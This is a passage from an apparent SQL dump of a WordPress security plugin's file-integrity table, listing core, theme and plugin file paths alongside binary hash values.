���3�','��DX�+C�]�D�$W+�f��yi><�\\�4��','',0,'?'),('����9�~\0{@���','wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i����oAP��=a�','9s����Z��D×e}���vu�O���','',0,'?'),('�u�t�� ��ɪ��','wp-content/plugins/wp-cerber/assets/flags/es.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݵ�*M,M\'A@��K�','�c`M�Cu��6�ם)X�%|G�W��ִ�>','',0,'?'),('���G�7�9K���I|�','wp-content/themes/vision-lite/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5�����ޠ�[�','\\�<-�+e���b�v�0��̥#�ƿ��_','',0,'?'),('���Clo�������','wp-admin/nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�g��>h}7�%<','4��ץk-%��� k@1��Rר�r�ÛN�','',0,'?'),('�&� Y�tz(�\Z��','wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j.\\�0*��� [����','f���8��\'!�RF���L���˙^�w��','',0,'?'),('��I<���U�CMdZ�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\nA�I�g��+��.','5�N叜p�o\'�GYNsC�IS��>LJ�','',0,'?'),('��-��i>bs��1�','wp-includes/js/jquery/ui/resizable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c0�N^�l�����L��','�~��i�{Q���ԯ��֕���YdF�w\r,�Ϲ','',0,'?'),('�PRhfiIv����Y�','wp-content/themes/regina-lite/layout/js/plugins/waypoints/waypoints.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|u\r�6LĈB�� ','P��6&a�H[ԭa,�j�8�_��Q� [Z�','',0,'?'),('\n���6[�6˷$��','wp-content/themes/doctors/core/home/blocks/text/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','):��\n_�K����#~�','�i���\'�\r[l�>�>�]��cc�4ج^�','',0,'?'),('\r�X�$�L�\'����','wp-content/themes/advance/inc/kirki/includes/class-kirki-enqueue.php',0,'�90�����>%�Hx','�90�����>%�Hx','�²�B�/ :5�en�y�r1A�/Ң�1��','',0,'?'),('\'Y���֖�>v�ǡ','wp-content/plugins/wp-cerber/assets/flags/td.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��б�n�HБ�����','��rJ���VO>\Z~dƨn`ik\Z����\\','',0,'?'),('9�L�/gJ�)3','wp-content/plugins/wp-cerber/assets/flags/bt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�@^؟J�H;��2:',' ��\'��A-��êu��rdƹ��Q����','',0,'?'),('@������4����@�:','wp-content/themes/twentytwenty/template-parts/content-cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���oh7��\\�+�','�ea::����8�Af�����J�;��Ak\n','',0,'?'),('m��D�ڜ�(�\r���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3R��d#\r\"���%','��ݩF�s�3G����b�8������N�@��X','',0,'?'),('��4r�%����j���','wp-includes/SimplePie/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�~Hwb�x��xsٷ:�','0���sD���;��P�=�\'��2� ��\0Df��','',0,'?'),('��KS+�eA�@��','wp-admin/css/colors/light/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��Y�Hn T��5^�','��Y�y�7B۩���/�c��$r��&���Z','',0,'?'),('��1H*, �^J','wp-content/themes/advance/inc/kirki/includes/scripts/class-kirki-scripts-icons.php',0,'I�=\rM��]_f���u','I�=\rM��]_f���u','���ҕm���ޅL�+��\0P��}>���','',0,'?'),('�����Fe� 57[�','wp-content/plugins/wordfence/lib/email_newIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��3岛�u�`�At','m)Th�)�\"=>�#a���Z;V<\0`�h �5�w','',0,'?'),('����UNEA�g�t','wp-includes/js/customize-selective-refresh.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uP岉�0x\Z�����','��q�˖jZC~����<sħ+�RI!�H��','',0,'?'),('�A�o�!�V��ų`v','wp-content/wflogs/ips.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('�|��X= �tlu�\Z~7','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Bc�\'���t�Iig','e��]��Y� c����1�7Ҟ[ ��=�','',0,'?'),('��l�Uy:e4�N1ϻo','wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]/�\0��7��(r��^','8U���GS�����5���l��rx���\\)��\n','',0,'?'),('yJ*S�ry����','wp-content/themes/regina-lite/inc/customizer/assets/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.ݲ�GA�ǣT\'��','yJ�����M3��J�V-�矕��6϶�','',0,'?'),(' o��ƕ��t_��\0.�','wp-content/plugins/wordfence/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ص���k�:]����','I���p��A�B�i���7��0rME�$}�y�','',0,'?'),('%~WN82��Q�O���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n4�F��0JC� n��k','�Cb,���\"�\">j���Ŋ��AlD�','',0,'?'),('\\���\Z�e �)��Up','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȑH�\Zb�>V�D��R2','rћJԑI/�\nO�Y}�x��ņ����U ','',0,'?'),('w���+\0���2�R','wp-includes/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zjo�\0��y,�*�}c','2p\"Wj����s�lf&S@�[�\\��\"W�','',0,'?'),('��4��t!��BŌ��,','wp-content/plugins/wordfence/js/wfglobal.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0>q� � ^�&�4r�&','���V�\"��_���+�J\0��_���>�J�','',0,'?'),('�-��B��|tS^�','wp-includes/customize/class-wp-customize-nav-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ԡ�P�\n}�$','�vG~?t7\0��h�R,��|�]9��p�.J�w','',0,'?'),('�ECW��`�`��-�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_@�e���3�b��B','�L�ؤ@J�9OhG�@@��Z!��\08#l�(','',0,'?'),('�t��d!b��ɪ�','wp-content/plugins/wp-cerber/assets/flags/tv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JP��ށ��J�','۽����ɇR�ZN��P����bX�c9h;��','',0,'?'),('���5��G�D��','wp-content/themes/healthcare/bg-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O���$ր?U��','���k�L�%+�\n�^��4�MJA��Lw>z','',0,'?'),('�x��ז忸��yq�','wp-content/themes/regina-lite/layout/images/page-headers/blog.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�ai�=>����L�','�Έ�5��g�٨Z�J��/$�o����$e�N=','',0,'?'),('�S˪�\n��B�V\"','wp-includes/fonts/dashicons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_�3$_�n��5��X',';ʐ\'8�4aOoY8-U�62���K�qq�$B�x','',0,'?'),('��\\��h\Z��)Ġ�','wp-includes/blocks/paragraph/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�T;��_Bjf�����','�Ƈ4pc���[<3iԁv�D������How<','',0,'?'),('�*Q. �-c�%�D','wp-content/plugins/wordfence/lib/flags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��c�磭��c�-','8�Y��CO���0�j{�\Zx��D�Ė��x�O�','',0,'?'),('��ܡ9�u_\\\n�9�\'','wp-admin/css/color-picker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���x��Ti6���','ۣq��T��zu���Oi�\\�5ЯY�u��~=c','',0,'?'),('�KU�g0MU�/��ʇ','wp-admin/admin-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xo��_���Բ)\n��r','�(�Z!.�e��TU92;�����ݏt5o�^','',0,'?'),('����.��N��*��','wp-content/themes/healthcare/bootstrap/css/bootstrap-theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dM��R�y]��Z','Q�+�nEE��)!�o�6j���Tv�jFn�z�)','',0,'?'),('\Z[�`��0CI$T��\'�','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�H��$I�3��^0','Dsmr?v�jz����Mo�3=b0���K�R#','',0,'?'),('4;V��\'�/����f�','wp-includes/js/jquery/ui/effect-scale.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KaJ�d���J\'^','_��q�x#�_�\0��<�J�c��~�ұ�ǫ','',0,'?'),('7���OW\n@�a','wp-admin/css/colors/modern/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&D�� �?G*��c��','�����w����V�e��am��x��Z�}\"6B','',0,'?'),(':�f�?bj���.���','wp-content/plugins/wordfence/views/blocking/block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j?G\\��g��2.&`�p9','F�� ��!�\ZB�q�ecC�u�]��P\0ŀ�;�','',0,'?'),(';�{���k���s��','wp-content/themes/twentytwenty/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~gfDA��K��.��M','��h��ڮ�n�?��U��`/3ܙ=�^��','',0,'?'),('>�ӡ��l�A��','wp-content/themes/healing-touch/images/icon-mail.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��Q���U5�{�.�','�_�U5v�cl���˰�F�#��И@6����','',0,'?'),('T�Ę5VH���P{��','wp-includes/Requests/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0��3�\Z�RI','-@��g %�����uON\\}@l���f\'���','',0,'?'),('V������* &>XV','wp-content/themes/weblog/acmethemes/sidebar-widget/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5vpf�i�<�\\�\r��','��g�\'��l�V3j���)��\"��`�Z��','',0,'?'),('��jo����8D��k','wp-content/plugins/wp-cerber/assets/flags/tz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�0���1�_NM','��_i`K�@D4���=�Z�2QcuY!z�=����','',0,'?'),('��q��YG�%����B','wp-content/themes/twentytwentyone/assets/sass/02-tools/mixins.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UM�� 0��;^=M','���،�@C�B+��=\Z���������','',0,'?'),('���C\n���U���','wp-admin/js/custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݎ�\Z���\Zڸ���','��v�N����;d�V��5d���t�,�','',0,'?'),('�n��O.���}','wp-content/themes/twentytwenty/templates/template-cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�R��w�O��,�|�','��\r���:�{Yh��\0�o\ni#�uޡh�s���tr','',0,'?'),('��0l��j�0+%�','wp-includes/SimplePie/Source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��A:�$]B-�vw�)','�\"���9M�a���U�_�h�I��>�,]�C�','',0,'?'),('���窒�u��\rZJW+','wp-content/plugins/wordfence/images/help.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$N�;\'��M��� Y','���\Z�7\0��r/i��z;ki,�=L�Z�g���','',0,'?'),('�)����t\r�,�Jڼ','wp-admin/options-permalink.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�\0�+���qQ=�m','Wsf.̢)\nP��_(�%�Z|��EV�t\rx��','',0,'?'),('iyN�� �Kl_|�','wp-content/themes/weblog/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0IY�ᬫ�S��T?�','�qW���d�K�ġ��3�W��본��vx','',0,'?'),('��v��R`z+X��%','wp-content/themes/wp-barrister/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6�5�y-C�]}h�','�͟�O���&I$�[q�c�̄�\'�R���ޠ��','',0,'?'),('�~d���W*M(}��','wp-content/themes/wp-barrister/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0F��%��6!eB','�1�NX�I���b��g�4��?�h�q�+o3','',0,'?'),('�?DŽ����:\n��X','wp-includes/customize/class-wp-customize-theme-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �K���WTՂ�c�','�&�^��J�eFX*i-t��;��8��t�\0O��','',0,'?'),('��g�<)��t.F��','wp-content/plugins/wp-cerber/assets/flags/aw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�g�qAŎ�RAj�?&v','J �M��wPs���0)n����F����b��','',0,'?'),('\Z��) �%iy�δ','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}+#z,��e�rEJ-','sf��q@��8�!yW�&ڔA�+/�uY���44�G','',0,'?'),('\Z�K��a�2Sc��kI','wp-content/plugins/wp-cerber/assets/flags/za.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ֨���˅hq�d�','s��Δ��֫V��`��`�R ;��cϯ���','',0,'?'),('/�縻��,��:�L','wp-content/themes/doctors/core/customizer/help/custom_control_color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/���j�VB����x','���2��]��eQI��\"��\rs�\Zs�','',0,'?'),('3�d����yj�����V','wp-content/plugins/wordfence/lib/menu_firewall_blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��fݎ;��#T��','�>�:�T���O��;���w_S�ݯ��&','',0,'?'),('UD|=�EV�Ȳ�\n#�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/controls/class-epsilon-control-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.\"�=�\\�䒎 ���',',p\n9)��H -�����x�u�\\z5zR.\Z�','',0,'?'),('Wl��y:�\0Vn`�d\0�','wp-includes/js/tinymce/plugins/wpview/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&���\rb���!���',',�`i�t���ڎ�Tm��l��k�s�\r=','',0,'?'),('f)[��W}͋#�ɍ\Z','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/sections/section-doubled.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�*�SWPD��','�k ��+ͱ�� �(�TجdI�4�l�x��e�','',0,'?'),('�,�4#��(�#','wp-signup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�*�\ra�*5�z�?�','��XjR�|%��Vs��j ��Q�XZ\r���','',0,'?'),('��sRc����v{�','wp-content/themes/doctors/core/assets/js/theme-customize-js.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@!�m���3{�wHs',' ���P�,�8������GD���o1Wo�\rv!','',0,'?'),('ǖ��d�!s<X��Я','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�1{,˾�ʂ��','<�G���$�U+�k�L>\0h�ahB��S�-�','',0,'?'),('쩯��b�/�y;�f','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nh��e�S�,����!','��,GK��f���o�a��t}߆#Z��s�v�\'�','',0,'?'),('�*沫�Q�N','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oV�7PR~���ai','b�\Z�����s#:�*�\\���\'�i@���qa','',0,'?'),('�Ĉ��ψ�x�>�H','wp-content/plugins/wp-cerber/assets/flags/sd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1y����s�)�x�','� �ZL���2���H��j�o�i�����','',0,'?'),('��/\'Ԯ�,�G=��g�','wp-content/themes/regina-lite/layout/css/bxslider.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^Sd��i�\rxu$��','͕��kOpr��ZU��MdZ!T^�HN�麚�','',0,'?'),('��y7��MA�@���','wp-includes/widgets/class-wp-widget-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9aP��,\n0��cHt��','�t�e�������wn2�v�\0o����e��2','',0,'?'),('1>���5YI0Ue','wp-content/themes/healthcare/js/wow.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U5�^�0�g��-�','w�;,�Yný럢[vp��yј2\"����O�','',0,'?'),('G��y���߳��aL','wp-content/themes/wp-barrister/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���θ9\"Ǘ�xʐl','��<(V^f�y}�q��X�\Z���m�P','',0,'?'),('�_)0d|�6_�;n','wp-includes/js/dist/rich-text.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y$�Bx!�u���w','��(��/�,gw�&tS��O}���E|�ʂ�','',0,'?'),(' (�ZKy��Ҩ窀)','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-control.php',0,'Bd���Ln;1v�����','Bd���Ln;1v�����','L��9!�\\w�9�DW{���Mֆ�31Lzq1','',0,'?'),('8�0`�q��Ɇ�4g��','wp-content/themes/doctors/core/home/home-content-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���52:�K����','X��U��_�V�2ݍ�\"�0�����\\�K�','',0,'?'),('>}�/K����q�%','wp-content/plugins/wordfence/css/wf-ionicons.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Al��s���j�⯃','ג��4�ˮ�v�����M�`�V��Z�','',0,'?'),('��<��i����Q\0','wp-includes/js/dist/reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�ގ�g��Ts؉f�','zt\r��j�Z\Z��H�ͼċ�!f����;��','',0,'?'),('�`&%eF�g����d','wp-content/plugins/wordfence/models/block/wfBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�1�g-M��@��','�Eϑ7���^\\0��uy|�]�J���\0�4��z�,','',0,'?'),('�O&\n�x�`$P� 6^','wp-content/themes/doctors/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�V��̸T��\0�̮f','AQ&��U�*wq�pe�����fVB���n�M','',0,'?'),('�:8�Ia��øl�m','wp-admin/includes/class-ftp-pure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&�}�\\3��J�� \0','�\nS�{U��Cdz$����y���a|8�[','',0,'?'),('�[���������R','wp-content/themes/twentynineteen/template-parts/post/author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\J��w���','2� ��ă���`�|��K 6<#:Gׯ��s','',0,'?'),('�ic� ���o�@���','wp-content/themes/healthcare/images/healthcare.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7R�6�o\Z �m�k��',']���M�r�e��Ջ�2��~v�P}�\r9�b��','',0,'?'),('����KqM���{���','wp-admin/css/dashboard.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3T8�orO�0�t=+Z%','������D�E����bF��Xx騞���','',0,'?'),('��sݜ�Þ3�����','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��7Ih�!���_�','�y�۹�����������!�H���HGH','',0,'?'),('�{xZ�c�\"�hb�?�','wp-includes/js/dist/dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k��\"���MM�','D�I�&�\"�H��-���Q࣋�Fzֱ�ev�','',0,'?'),('�TB��O>�v2��}Ea','wp-includes/SimplePie/Locator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�3�y�%14���','<���ms�4�3p-I�/�8\'J�� }.�','',0,'?'),('ijp7IK��3��Y�Ä','wp-content/themes/skt-toothy/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ג�Z��*|�K2���','7:������sMA�����Y�}��Q���','',0,'?'),('�)���E�p������','wp-content/themes/weblog/assets/library/respond/respond.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�v|�����ב\'�','�i�CPE#�l�f��H��H�0�sքXk','',0,'?'),('�^�2��_�0\':U�Z','wp-content/themes/healing-touch/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��QrŶ4������','ڢ\"5��{=��q�69gQ�Q�Գ��0��\"�7','',0,'?'),('��W�MF`3��$��','wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y^�������','Y Q�FX��2�2�FW���)���fKSf�','',0,'?'),('�-ФQ�1Ц\r �','wp-content/themes/twentynineteen/sass/variables-site/_variables-site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G\0��\\t4����E�','�,%d:?�-�ǯM�!k���gF6�ݱ���R�lj','',0,'?'),('��*�7\r��?�','wp-includes/class-requests.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X@�?i� Xc����','���$��\r7�U���M����]���g6�>C','',0,'?'),('L��e`d�˻��W','wp-content/plugins/wp-cerber/assets/flags/je.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�l1�r$~�A�)','wp-content/plugins/wp-cerber/assets/flags/as.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�/����Z�3�','��UŰ�\r�^�W�}�Ux\"�C�@�Scu�l','',0,'?'),('�of?�3�P�1�\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\"̤/O���Y��\'','�8�e�T�et\r j�P�/��J���<^�rӥz','',0,'?'),('=]ŷ�d��Ht��6','wp-content/themes/doctors/core/assets/css/theme-base-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ѦNZ�k�p���f','�м�)u��\n��4h}5��tSj�ԃ�^t��','',0,'?'),('F��e���}�(��','wp-includes/js/jquery/ui/dialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']2�z�L!E��,�C\Z','���|\r�Ce>�/k˪�\"E�0�݀V�L�','',0,'?'),('N�\0f��~;I���','wp-content/plugins/wp-cerber/assets/flags/bm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��g��¶Mn�z�','��<������@ H�*��eթ�G�)�-CIԲ^','',0,'?'),('W��5^��l_�_#�','wp-content/themes/twentynineteen/sass/typography/_typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>�7�2��n��t','��nek�o@�l�_���ky~�YWŢA���','',0,'?'),('i1��E~N�I�A͔��','wp-includes/Requests/Cookie/Jar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0_��&p��\"4�\\�','c��!�#B�i*+\"�\r�n���Iƈ�XÉ��w�','',0,'?'),('r�Ǹ2�=���=�','wp-content/themes/weblog/assets/library/Font-Awesome/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SC�\Z(ze� �v��a�','���z���B�h@\ZR�`+�)A� ��>��','',0,'?'),('s♼{DR�[�k�1�I','wp-content/plugins/wordfence/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zF��ހW�\rl�~6','V�{��Q9�V ����J X�q���ڀc�','',0,'?'),('x��T �*�{����','wp-content/themes/healthcare/home-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e��mϸ@�K�q�','U���Z�O@@1:0brx�\'��䚟1���.','',0,'?'),('����X/��\0�� ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','On�4�r���\'f=','�b�����*�9Y�[]�\rᕂ\'�yԩ�e��','',0,'?'),('�N3M�\n��S��0j','wp-includes/js/dist/block-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`\\{�O�\Z�sl=��','��Pu6��Qi��D�9ï��_�iZ�G��Ad��','',0,'?'),('�}�@НD�j&�U�','wp-content/themes/healthcare/admin/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>Gh}�0�?���J� �',';�T)��0vc��!��Dv$p-�:�jp��','',0,'?'),('�t3\n�&�s�d)OW','wp-content/themes/advance/inc/kirki/includes/output/class-kirki-output.php',0,'s�\0~�4���8P','s�\0~�4���8P','��@ow����YNtqW~��e�߇�X^aiH','',0,'?'),('����F�\\G�\"����','wp-content/themes/vision-lite/change_log.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' *-�+���y���)','Lp\n��1��}�\"���[\Z��f��T-�x�P','',0,'?'),('�x(�ťܺ�.���Շ','wp-includes/class-wp-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9]�K�UJW�*��h�=','���4�\ZQuA^ء��j$M��0�\0','',0,'?'),('��h�R�ˌh�&','wp-content/themes/wp-barrister/library/images/nothumb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d���Ȼ�)\Zs6�','��(ch��>�<:�atv��*��8:��o��','',0,'?'),('Ԓ��A����r��^','wp-includes/js/wp-custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+,�!�ڊLӺ~ν7�','��E�zk;3K�*X$���i���q��n��','',0,'?'),('�^0p����k����M','wp-includes/css/dist/nux/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ip����8\0p���','���������3Bk~�x*N���K}�mǧ߸n�','',0,'?'),('�S ����g N�d','wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6_DB��NI�9���Ŷ�','���~DIb�xb{�IdO�.C�����:z/�D5�','',0,'?'),('���h]��C���A*','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'I�˞aFtz\\�Ǯ','���Ҭ�\ZADs���5����?���D�A/<�:','',0,'?'),('�0ܚ�Z�I�丱N','wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�U巃�� qD�F��H','���Ԧ�!���ӢtL�k.�\"1��Cm�Kg�','',0,'?'),('�3ƹܕj�bi�Υ�','wp-includes/customize/class-wp-customize-nav-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@V{R#8�7n�n\n�','��a�H����Muyw?�h:�B��<=��,##�','',0,'?'),('� wE��r��} �','wp-content/plugins/wp-cerber/assets/flags/gq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�>.ⶱ���G','�d����^f�r��=�mM���Y��,���','',0,'?'),('� �O��p��ȍ>5','wp-content/themes/doctors/core/contents/loop_page/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�Fa��.���>Ś','���#tB� <϶>��KӹKy��ɋ�A��','',0,'?'),('b���E�����4t=','wp-content/plugins/wordfence/views/dashboard/options-group-alert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̻o��wG>p','�I�`I^{�Pנh�Q��e:sG^��8�sĚ','',0,'?'),('|��|��<28��x�<','wp-content/themes/doctors/core/contents/loop_templateContact/skin1/js.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� 